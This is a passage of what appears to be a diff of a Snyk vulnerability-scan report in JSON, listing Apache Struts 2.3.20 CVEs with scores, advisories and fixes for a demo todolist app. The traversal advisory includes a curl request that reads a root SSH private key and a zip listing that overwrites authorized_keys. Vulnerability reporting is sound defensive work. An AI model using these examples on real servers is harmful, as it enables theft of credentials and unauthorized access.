"severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:39.893991Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:49.896841Z" - } - ], - "description": "## Overview\r\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22)\r\nApache Struts 2.3.20.x before 2.3.20.3, 2.3.24.x before 2.3.24.3, and 2.3.28.x before 2.3.28.1, when Dynamic Method Invocation is enabled, allow remote attackers to execute arbitrary code via vectors related to an ! 
(exclamation mark) operator to the REST Plugin.\r\n\r\n## References\r\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3087)", - "epssDetails": { - "percentile": "0.97435", - "probability": "0.46493", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-3087" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.339000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-06-02T00:40:36Z", - "exploitDetails": { - "sources": [ - "ExploitDB", - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "High", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2016-06-02T00:40:36Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-06-03T08:53:12.756827Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.20.3" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-30773", - "title": "Cross-site Scripting (XSS)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.3.28)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.28" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 6.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": 
"https://github.com/apache/struts/commit/5421930b49822606792f36653b17d3d95ef106f9", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/72471d7075681bea52046645ad7aa34e9c53751e", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/a89bbe22cd2461748d595a89a254de888a415e6c", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4003", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "cvssV3BaseScore": 6.1, - "modificationTime": "2024-03-11T09:46:54.345030Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:27.272926Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 6.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:54.345030Z" - } - ], - "description": "## Overview\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22)\nCross-site Scripting (XSS) vulnerability in the URLDecoder function in JRE before 1.8, as used in Apache Struts 2.x before 2.3.28, when using a single byte page encoding, allows remote attackers to inject arbitrary web script or HTML via multi-byte characters in a url-encoded parameter.\n\n## Details\nA cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.\r\n\r\nThis is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. 
The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.\r\n\r\nֿInjecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.\r\n\r\nEscaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, `<` can be coded as `<`; and `>` can be coded as `>`; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses `<` and `>` as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.\r\n \r\nThe most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware. \r\n\r\n### Types of attacks\r\nThere are a few methods by which XSS can be manipulated:\r\n\r\n|Type|Origin|Description|\r\n|--|--|--|\r\n|**Stored**|Server|The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.|\r\n|**Reflected**|Server|The attacker delivers a malicious link externally from the vulnerable web site application to a user. 
When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \r\n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\r\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\r\n\r\n### Affected environments\r\nThe following environments are susceptible to an XSS attack:\r\n\r\n* Web servers\r\n* Application servers\r\n* Web application environments\r\n\r\n### How to prevent\r\nThis section describes the top best practices designed to specifically protect your code: \r\n\r\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \r\n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. 
\r\n* Give users the option to disable client-side scripts.\r\n* Redirect invalid requests.\r\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\r\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\r\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4003)", - "epssDetails": { - "percentile": "0.88699", - "probability": "0.01905", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-4003" - ], - "CWE": [ - "CWE-79" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.353000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-03-16T06:52:13.014000Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2016-03-16T06:52:13.014000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:54.345030Z", - "socialTrendAlert": false, - "severityWithCritical": "medium", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.28" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-30774", - "title": "Cross-site Request Forgery (CSRF)", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - 
"credit": [ - "Takeshi Terada" - ], - "semver": { - "vulnerable": [ - "[2.3.20,2.3.29)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.29" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://struts.apache.org/docs/s2-038.html", - "title": "Apache Struts Security Bulletin" - }, - { - "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4430", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:46:55.023333Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:09.208211Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:55.023333Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Cross-site Request Forgery (CSRF). 
It mishandles token validation, which allows remote attackers to conduct CSRF attacks via unspecified vectors.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n## References\n- [Apache Struts Security Bulletin](https://struts.apache.org/docs/s2-038.html)\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4430)\n", - "epssDetails": { - "percentile": "0.75315", - "probability": "0.00450", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-4430" - ], - "CWE": [ - "CWE-352" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.364000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-06-20T07:00:37Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2016-06-20T07:00:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:55.023333Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.29" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-30775", - "title": "Access Restriction Bypass", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "credit": [ - "Takeshi Terada" - ], - "semver": { - "vulnerable": [ - "[2.3.20,2.3.29)" - ] - }, - "exploit": "Not 
Defined", - "fixedIn": [ - "2.3.29" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://struts.apache.org/docs/s2-040.html", - "title": "Apache Struts Security Bulletin" - }, - { - "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4431", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:46:55.000380Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:37.211840Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:55.000380Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. 
It allows remote attackers to bypass intended access restrictions and conduct redirection attacks by leveraging a default method.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n## References\n- [Apache Struts Security Bulletin](https://struts.apache.org/docs/s2-040.html)\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4431)\n", - "epssDetails": { - "percentile": "0.83001", - "probability": "0.00914", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-4431" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.377000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-06-21T04:49:27Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2016-06-21T04:49:27Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:55.000380Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.29" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-30776", - "title": "Access Restriction Bypass", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "credit": [ - "Takeshi Terada" - ], - "semver": { - "vulnerable": [ - "[2.3.20, 2.3.29)" - ] - }, - 
"exploit": "Not Defined", - "fixedIn": [ - "2.3.29" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 7.5, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", - "title": "GitHub Commit" - }, - { - "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433", - "title": "NVD" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:46:52.478661Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "Snyk", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:39.417349Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:46:52.478661Z" - } - ], - "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. 
It allows remote attackers to bypass intended access restrictions and conduct redirection attacks via a crafted request.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433)\n", - "epssDetails": { - "percentile": "0.77304", - "probability": "0.00531", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-4433" - ], - "CWE": [ - "CWE-20" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.390000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-06-21T01:33:07Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2016-06-21T01:33:07Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:46:52.478661Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.29" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-30778", - "title": "Directory Traversal", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Takeshi Terada" - ], - "semver": { - "vulnerable": [ - "[2.3.20,2.3.31)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.3.31" - ], - "patches": [], - "insights": { - 
"triageAdvice": null - }, - "language": "java", - "severity": "critical", - "cvssScore": 9.8, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": "org.apache.struts:struts2-core", - "references": [ - { - "url": "http://struts.apache.org/docs/s2-042.html", - "title": "Apache Security Advisory" - }, - { - "url": "https://github.com/apache/struts/commit/030ffa33543f8953306ed0c0dc815c7fb74d7129", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/8e67b9144aa643769b261e2492cb561e04d016ab", - "title": "GitHub Commit" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:03.921305Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:32.508677Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:03.921305Z" - } - ], - "description": "## Overview\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22)\nAffected versions of the package are vulnerable to Directory Traversal.\n\n## Details\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. 
By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\r\n\r\nDirectory Traversal vulnerabilities can be generally divided into two types:\r\n\r\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\r\n\r\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\r\n\r\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\r\n\r\n```\r\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\r\n```\r\n**Note** `%2e` is the URL encoded version of `.` (dot).\r\n\r\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \r\n\r\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\r\n\r\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\r\n\r\n```\r\n2018-04-15 22:04:29 ..... 19 19 good.txt\r\n2018-04-15 22:04:42 ..... 
20 20 ../../../../../../root/.ssh/authorized_keys\r\n```\n\n\n## References\n- [Apache Security Advisory](http://struts.apache.org/docs/s2-042.html)\n", - "epssDetails": { - "percentile": "0.89019", - "probability": "0.02019", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2016-6795" - ], - "CWE": [ - "CWE-94" - ] - }, - "packageName": "org.apache.struts:struts2-core", - "proprietary": false, - "creationTime": "2017-02-22T07:28:23.415000Z", - "functions_new": [], - "alternativeIds": [], - "disclosureTime": "2016-10-19T01:09:09.263000Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "org.apache.struts", - "artifactId": "struts2-core" - }, - "publicationTime": "2016-10-19T01:09:09.263000Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:47:03.921305Z", - "socialTrendAlert": false, - "severityWithCritical": "critical", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "org.apache.struts:struts2-core@2.3.20" - ], - "upgradePath": [ - false, - "org.apache.struts:struts2-core@2.3.31" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "org.apache.struts:struts2-core", - "version": "2.3.20" - }, - { - "id": "SNYK-JAVA-ORGAPACHESTRUTS-31495", - "title": "Arbitrary Command Execution", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:R", - "credit": [ - "LGTM Security Team" - ], - "semver": { - "vulnerable": [ - "[,2.3.34)", - "[2.4,2.5.13)" - ] - }, - "exploit": "High", - "fixedIn": [ - "2.3.34", - "2.5.13" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [], - "malicious": false, - "isDisputed": false, - "moduleName": 
"org.apache.struts:struts2-core", - "references": [ - { - "url": "https://cwiki.apache.org/confluence/display/WW/S2-052", - "title": "Apache Security Bulletin" - }, - { - "url": "https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax", - "title": "Apache Struts Statement on Equifax Security Breach" - }, - { - "url": "https://www.exploit-db.com/exploits/42627", - "title": "Exploit DB" - }, - { - "url": "https://github.com/apache/struts/commit/19494718865f2fb7da5ea363de3822f87fbda26", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/apache/struts/commit/6dd6e5cfb7b5e020abffe7e8091bd63fe97c10a", - "title": "GitHub Commit" - }, - { - "url": "https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement", - "title": "LGTM Advisory" - }, - { - "url": "https://lgtm.com/blog/apache_struts_CVE-2017-9805", - "title": "LGTM Vulnerability Details" - }, - { - "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", - "title": "CISA - Known Exploited Vulnerabilities" - }, - { - "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2017/CVE-2017-9805.yaml", - "title": "Nuclei Templates" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:47:48.667611Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:R", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:15.532569Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:47:48.667611Z" - } - ], - "description": "## Overview\r\n[Apache Struts2](http://struts.apache.org/) is a popular open-source 
framework for developing web applications in the Java programming language.\r\n\r\nThe REST Plugin in affected versions use a `XStreamHandler` with an instance of XStream for deserialization without any type filtering. By design, there are few limits to the type of objects XStream can handle. This flexibility comes at a price. The XML generated or consumed by XStream includes all information required to build Java objects of almost any type. The provided XML data is used by XStream to unmarshal Java objects. An attacker could use this flaw to execute arbitrary code or conduct further attacks.\r\n\r\n[A working exploit](https://github.com/rapid7/metasploit-framework/commit/5ea83fee5ee8c23ad95608b7e2022db5b48340ef) is publicly available and [is actively](https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/) exploited in the wild.\r\n\r\nYou can read more about this vulnerability [on our blog](https://snyk.io/blog/equifax-breach-vulnerable-open-source-libraries/).\r\n\r\n# Details\r\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker control the state or the flow of the execution. 
\r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n- Apache Blog\r\n\r\n\r\n## Remediation\r\nDevelopers are strongly advised to upgrade their _Apache Struts_ components to version `2.3.34`, `2.5.13` or higher.\r\n\r\nIt is possible that some REST actions stop working because of applied default restrictions on available classes. 
